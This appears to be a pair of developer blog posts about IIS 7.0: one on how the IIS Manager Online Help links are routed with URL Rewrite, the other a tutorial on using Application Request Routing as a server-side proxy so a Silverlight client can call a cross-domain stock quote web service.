    While using IIS Manager, did you ever wonder which configuration section a given UI page is changing? Or whether there is a way to automate it using scripts or the command line?

    Well, if you use IIS Manager 7.0 you might have noticed that we have a link on every page called Online Help, and if you've ever clicked it you would have noticed that it takes you to the IIS 7 Operations Guide. You might ask yourself whether it was really that important to place that link on every page, and the answer is that we had other reasons to add it there.

    Back when we were designing the UI we realized we wanted to provide the best content we could for each page, and potentially be able to update it as more content became available; for that reason we added this link. However, the content was not ready at the time, so instead we pointed it to our Operations Guide.

    But the good news is that we are updating those links to point to their respective entries in the Configuration Reference that was recently published. This means that now, on any page in IIS Manager, if you click Online Help we will point you to the configuration section that the UI changes, which will give you details about what the section looks like and ways to change it using scripts, AppCmd, etc.

    Online Help

    An interesting thing: this new routing mechanism is brought to you by our very own URL Rewrite module, with a simple rewrite map and a couple of rules (a rough sketch is below). If you haven't looked into it, you should definitely download it and give it a try; you'll soon realize that there are so many things you can do without writing any code that you'll love it.
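
    Just to illustrate the idea (the map name, keys and target URLs here are made up; this is not the actual configuration we use), a rewrite map plus one rule could route help requests like this:

    <rewrite>
      <rewriteMaps>
        <rewriteMap name="OnlineHelpMap">
          <!-- Hypothetical mapping from a UI page identifier to its Configuration Reference entry -->
          <add key="/help/defaultdocument" value="/configreference/system.webserver/defaultdocument" />
        </rewriteMap>
      </rewriteMaps>
      <rules>
        <rule name="Online Help routing" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <!-- Look up the requested path in the map; if it is found, redirect to the mapped value -->
            <add input="{OnlineHelpMap:{REQUEST_URI}}" pattern="(.+)" />
          </conditions>
          <action type="Redirect" url="{C:1}" />
        </rule>
      </rules>
    </rewrite>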

  • CarlosAg Blog

    Calling Web Services from Silverlight using IIS 7.0 and ARR


    During this PDC I attended Ian's presentation about WPF and Silverlight, where he demonstrated the high degree of compatibility that can be achieved between a WPF desktop application and a Silverlight application. One of the differences he demonstrated involved consuming Web Services: since Silverlight applications execute in a sandboxed environment, they are not allowed to call arbitrary Web Services or issue HTTP requests to servers other than the originating server, or a server that exposes a cross-domain manifest stating that it is allowed to be called by clients from that domain.

    Then he moved on to show how you can work around this architectural difference by writing your own Web Service or HTTP endpoint that basically gets the request from the client and, using code on the server, just calls the real Web Service. This way the client sees only the originating server, which allows the call to succeed, and the server can freely call the real Web Service. Funny enough, while searching for a quote service I ran into an article from Dino Esposito in MSDN Magazine where he explains the same issue and also exposes a "compatibility layer", which again is just code (more than 40 lines of code) acting as a proxy that calls a Web Service (except he uses the JSON serializer to return the values).

    The obvious disadvantage is that this means you have to write code that only forwards the request and returns the response, acting essentially as a proxy. Of course this can be very simple, but if the Web Service you are trying to call has any degree of complexity, where custom types are being sent around, or if you actually need to consume several of the methods it exposes, then it quickly becomes a big maintenance nightmare trying to keep them in sync when they change, to do error handling properly, and to deal with differences when reporting network issues, SOAP exceptions, HTTP exceptions, etc.

    So after looking at this, I immediately thought about ARR (Application Request Routing), a new extension for IIS 7.0 that you can download for free from IIS.NET for Windows Server 2008 and that, among many other things, is capable of doing this kind of routing without writing a single line of code.

    This blog post tries to show how easy it is to implement this using ARR. Here are the steps to try it (below you can find the software required); note that if you are only interested in what is really new, just go to the 'Enter ARR' section below to see the configuration that fixes the Web Service call.

    1. Create a new Silverlight Project (linked to an IIS Web Site)
      1. Launch Visual Web Developer from the Start Menu
      2. File->Open Web Site->Local IIS->Default Web Site. Click Open
      3. File->Add->New Project->Visual C#->Silverlight->Silverlight Application
      4. Name: SampleClient, Location: c:\Demo, click OK
      5. On the "Add Silverlight Application" dialog choose the "Link this Silverlight control into an existing Web site", and choose the Web site in the combo box.
      6. This will add a SampleClientTestPage.html to your Web site which we will run to test the application.
    2. Find a Web Service to consume
      1. In my case I searched the Web for a Stock Quote Service and found one at
    3. Back at our Silverlight project, add a Service Reference to the WSDL
      1. Select the SampleClient project in the Solution Explorer window
      2. Project->Add Service Reference and type in the Address and click Go
      3. Specify a friendly Namespace, in this case StockQuoteService
      4. Click OK
    4. Add a simple UI to call the Service
      1. In the Page.xaml editor type the following code inside the <UserControl></UserControl> tags:
      2.     <Grid x:Name="LayoutRoot" Background="Azure">
          <Grid.RowDefinitions>
            <RowDefinition Height="30" />
            <RowDefinition Height="*" />
          </Grid.RowDefinitions>
          <Grid.ColumnDefinitions>
            <ColumnDefinition Width="50" />
            <ColumnDefinition Width="*" />
            <ColumnDefinition Width="50" />
          </Grid.ColumnDefinitions>
          <TextBlock Grid.Column="0" Grid.Row="0" Text="Symbol:" />
          <TextBox Grid.Column="1" Grid.Row="0" x:Name="_symbolTextBox" />
          <Button Grid.Column="2" Grid.Row="0" Content="Go!" Click="Button_Click" />
          <ListBox Grid.Column="0" Grid.Row="1" x:Name="_resultsListBox" Grid.ColumnSpan="3" ItemsSource="{Binding}">
            <ListBox.ItemTemplate>
              <DataTemplate>
                <StackPanel Orientation="Horizontal">
                  <TextBlock Text="{Binding Path=Name}" FontWeight="Bold" Foreground="DarkBlue" />
                  <TextBlock Text=" = " />
                  <TextBlock Text="{Binding Path=Value}" />
                </StackPanel>
              </DataTemplate>
            </ListBox.ItemTemplate>
          </ListBox>
        </Grid>
      3. Right click the Button_Click text above and select the "Navigate to Event Handler" context menu.
      4. Enter the following code to call the Web Service
      5.     private void Button_Click(object sender, RoutedEventArgs e)
        {
            var service = new StockQuoteService.StockQuoteSoapClient();
            service.GetQuoteCompleted += service_GetQuoteCompleted;
            service.GetQuoteAsync(_symbolTextBox.Text);
        }
      6. Now, since we are going to use LINQ to XML to parse the result of the Web Service, which is XML, we need to add a reference to System.Xml.Linq by using Project->Add Reference->System.Xml.Linq.
      7. Finally, add the following function to handle the result of the Web Service
      8.     void service_GetQuoteCompleted(object sender, StockQuoteService.GetQuoteCompletedEventArgs e)
        {
            var el = System.Xml.Linq.XElement.Parse(e.Result);
            _resultsListBox.DataContext = el.Element("Stock").Elements();
        }
    5. Compile the application. Build->Build Solution.
    6. At this point we are ready to test our application, to run it just navigate to http://localhost/SampleClientTestPage.html or simply select the SampleClientTestPage.html in the Solution Explorer and click View In Browser.
    7. Enter a stock symbol (say MSFT), press Go! and verify that it breaks. You will see a small "Error in page" message with a warning icon in the status bar. If you click it and select Show details, you will get a dialog with the following message:
    8. Message: Unhandled Error in Silverlight 2 Application An exception occurred during the operation, making the result invalid. 

    Enter Application Request Routing and IIS 7.0

    1. OK, so now we are running into the cross-domain issue, and unfortunately the remote server does not expose a cross-domain manifest for us. Here is where ARR can help us call the service without writing more code
    2. Modify the Web Service configuration to call a local Web Service instead
      1. Back in Visual Web Developer, open the file ServiceReferences.ClientConfig
      2. Modify the address="" attribute to be address="http://localhost/stockquote.asmx" instead; it should look like:
      3.     <client>
          <endpoint address="http://localhost/stockquote.asmx"
                    binding="basicHttpBinding" bindingConfiguration="StockQuoteSoap"
                    contract="StockQuoteService.StockQuoteSoap" name="StockQuoteSoap" />
        </client>
    3. This will cause the client to call the Web Service on the originating server; now we can configure an ARR/URL Rewrite rule to route the Web Service requests to the original endpoint
      1. Add a new Web.config to the http://localhost project (Add new item->Web.config)
      2. Add the following content:
      3. <?xml version="1.0" encoding="UTF-8"?>
        <configuration><system.webServer><rewrite><rules>
        <rule name="Stock Quote Forward" stopProcessing="true">
        <match url="^stockquote.asmx$" />
        <action type="Rewrite" url="" />
        </rule>
        </rules></rewrite></system.webServer></configuration>
    4. This rule basically uses a regular expression to match requests for StockQuote.asmx and forwards them to the real Web Service.
    5. Compile everything by running Build->Rebuild Solution
    6. Back in your browser, refresh the page to get the new version, enter MSFT in the symbol box and press Go!
    7. And Voila!!! everything works.


    One of the features offered by ARR is proxy functionality that forwards requests to another server. One of the scenarios where this is useful is calling it from clients that cannot make calls directly to the real data source; this includes Silverlight, Flash and AJAX applications. As shown in this post, with just a few lines of XML configuration you can enable clients to call services in other domains without having to write hundreds of lines of code for each method. It also means that I get the original data, and that if the WSDL were to change I would not need to update any wrappers. Additionally, if you are using REST-based services you could use local caching on your server, relying on output caching, and increase the performance of your applications significantly (again with no code changes), as sketched below.
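
    As a rough sketch of that server-side output caching (the .json extension and the one-minute duration are just illustrative assumptions, not something ARR configures for you), a web.config fragment like this caches matching responses for 60 seconds:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <caching>
          <profiles>
            <!-- Cache responses for .json requests for 60 seconds -->
            <add extension=".json" policy="CacheForTimePeriod" duration="00:01:00" />
          </profiles>
        </caching>
      </system.webServer>
    </configuration>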

    Software used

    Here is the software I installed to do this sample (amazing that all of it is completely free):

    1. Install Visual Web Developer 2008 Express
    2. Install Silverlight Tools for Visual Studio 2008 SP 1
    3. Install Application Request Routing for IIS 7.